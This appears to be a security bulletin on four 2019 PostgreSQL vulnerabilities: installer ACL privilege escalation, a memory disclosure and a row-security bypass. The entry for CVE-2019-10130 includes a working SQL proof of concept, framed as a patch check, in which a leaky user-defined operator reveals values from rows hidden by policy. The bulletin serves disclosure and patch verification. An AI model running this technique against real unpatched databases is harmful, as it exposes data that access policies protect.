Multiple vulnerabilities in PostgreSQL



Published: 2019-05-10
Risk: Low
Patch available: Yes
Number of vulnerabilities: 4
CVE-ID: CVE-2019-10127, CVE-2019-10128, CVE-2019-10129, CVE-2019-10130
CWE-ID: CWE-264, CWE-401
Exploitation vector: Network (CVE-2019-10129, CVE-2019-10130); local (CVE-2019-10127, CVE-2019-10128)
Public exploit: N/A
Vulnerable software: PostgreSQL (Server applications / Database software)

Vendor: PostgreSQL Global Development Group

Security Bulletin

This security bulletin contains information about 4 vulnerabilities.

1) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18421

Risk: Low

CVE-ID: CVE-2019-10127

CWE-ID: CWE-264

Exploit availability: N/A (no public exploit)

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists because the BigSQL Windows installer does not remove permissive ACL entries from the files and directories it installs. Because those ACLs grant broad access to the installation, a local user on the same host can gain unauthorized access to the PostgreSQL installation directory and escalate privileges to those of the PostgreSQL service.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

PostgreSQL 11.3, 10.8, 9.6.13, 9.5.17, 9.4.22 (reinstall with the updated BigSQL Windows installer)

External links

http://www.postgresql.org/about/news/1939/



2) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18422

Risk: Low

CVE-ID: CVE-2019-10128

CWE-ID: CWE-264

Exploit availability: N/A (no public exploit)

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists because the EnterpriseDB Windows installer does not remove permissive ACL entries from the files and directories it installs. Because those ACLs grant broad access to the installation, a local user on the same host can gain unauthorized access to the PostgreSQL installation directory and escalate privileges to those of the PostgreSQL service.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

PostgreSQL 11.3, 10.8, 9.6.13, 9.5.17, 9.4.22 (reinstall with the updated EnterpriseDB Windows installer)

External links

http://www.postgresql.org/about/news/1939/



3) Memory leak

EUVDB-ID: #VU18423

Risk: Low

CVE-ID: CVE-2019-10129

CWE-ID: CWE-401

Exploit availability: N/A (no public exploit)

Description

The vulnerability allows a remote authenticated user to read parts of server memory.

The vulnerability exists due to a memory-handling error in partition routing when processing INSERT statements in PostgreSQL 11. A remote authenticated user who can INSERT into a partitioned table can issue a specially crafted INSERT statement and read portions of the server process's memory.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 11.0 - 11.2

Fixed software versions

PostgreSQL 11.3

External links

http://www.postgresql.org/about/news/1939/



4) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU18424

Risk: Low

CVE-ID: CVE-2019-10130

CWE-ID: CWE-264

Exploit availability: N/A (no public exploit)

Description

The vulnerability allows a remote authenticated user to bypass row security policies.

The vulnerability exists because the query planner's selectivity estimators evaluate operators against the column statistics that ANALYZE collects (most-common-value lists and histograms) without taking row security policies into account. Those statistics are sampled from every row of the table, including rows a policy hides from the current user. A remote authenticated user with SELECT privilege on a table protected by row security can therefore supply a leaky, user-defined operator in a WHERE clause and observe the sampled values the planner passes to it, gaining access to data from restricted rows.
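The following check reproduces the mechanism described above so that an administrator can confirm a server is patched. It is added here and is not part of the advisory or of the PostgreSQL project's code; the role, table, function and operator names are hypothetical. It is meant to be run with psql as a superuser in a scratch database. On an affected server the final SELECT prints NOTICE lines containing 'SECRET-MCV', a value that exists only in rows hidden by the policy; on a fixed server the planner declines to feed statistics to a non-LEAKPROOF operator on a table with row security enabled, so no such NOTICE appears, while in both cases the result set itself is correctly filtered.

```sql
-- Added check script; not from the advisory or from the PostgreSQL project.
-- Run with psql as a superuser in a scratch database. Role, table, function
-- and operator names below are hypothetical.

-- 1. Owner side: a table with a row security policy, then ANALYZE it.
CREATE ROLE rls_probe;                           -- low-privilege test role
CREATE TABLE patients (id int PRIMARY KEY, owner text, diagnosis text);
INSERT INTO patients
SELECT g,
       CASE WHEN g % 2 = 0 THEN 'rls_probe' ELSE 'someone_else' END,
       CASE WHEN g % 2 = 0 THEN 'allowed-' || g ELSE 'secret-' || g END
FROM generate_series(1, 1000) AS g;
-- Repeat one hidden value often so ANALYZE puts it in the most-common-values list.
UPDATE patients SET diagnosis = 'SECRET-MCV'
 WHERE owner = 'someone_else' AND id % 10 = 1;

ALTER TABLE patients ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON patients FOR SELECT TO rls_probe
  USING (owner = current_user);
GRANT SELECT ON patients TO rls_probe;
ANALYZE patients;   -- pg_statistic now holds samples drawn from every row, hidden or not

-- 2. Attacker side: a non-LEAKPROOF comparison function whose side effect
--    reveals its argument, wrapped in an operator that reuses the built-in
--    equality estimator eqsel. On PostgreSQL 15+ the role first needs
--    GRANT CREATE ON SCHEMA public TO rls_probe.
SET ROLE rls_probe;
CREATE FUNCTION leaky_eq(text, text) RETURNS boolean LANGUAGE plpgsql AS $$
BEGIN
  RAISE NOTICE 'planner evaluated me against: %', $1;
  RETURN $1 = $2;
END
$$;
CREATE OPERATOR === (
  LEFTARG = text, RIGHTARG = text,
  PROCEDURE = leaky_eq,      -- FUNCTION = is the newer spelling; PROCEDURE works on 9.4+
  RESTRICT = eqsel
);

-- 3. The probe. Row security still filters the result (only id 2 comes back),
--    but while estimating selectivity an unpatched planner calls leaky_eq()
--    on each most-common value, so a NOTICE containing 'SECRET-MCV' appears.
--    A fixed server (11.3 / 10.8 / 9.6.13 / 9.5.17 / 9.4.22 or later) skips the
--    statistics for this operator and prints no such NOTICE.
SELECT id FROM patients WHERE diagnosis === 'allowed-2';
RESET ROLE;

-- Cleanup:
-- DROP OPERATOR === (text, text); DROP FUNCTION leaky_eq(text, text);
-- DROP TABLE patients; DROP ROLE rls_probe;
```

The operator borrows eqsel because that estimator compares the query constant against each most-common value by calling the operator's underlying function; any estimator that evaluates the operator on sampled values would do. Marking leaky_eq as LEAKPROOF is not an option for an ordinary role, which is exactly why the fix gates statistics use on leakproofness and on the absence of row security for the querying user.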

Mitigation

Install updates from vendor's website.

Vulnerable software versions

PostgreSQL: 9.4.0 - 11.2

Fixed software versions

PostgreSQL 11.3, 10.8, 9.6.13, 9.5.17, 9.4.22

External links

http://www.postgresql.org/about/news/1939/


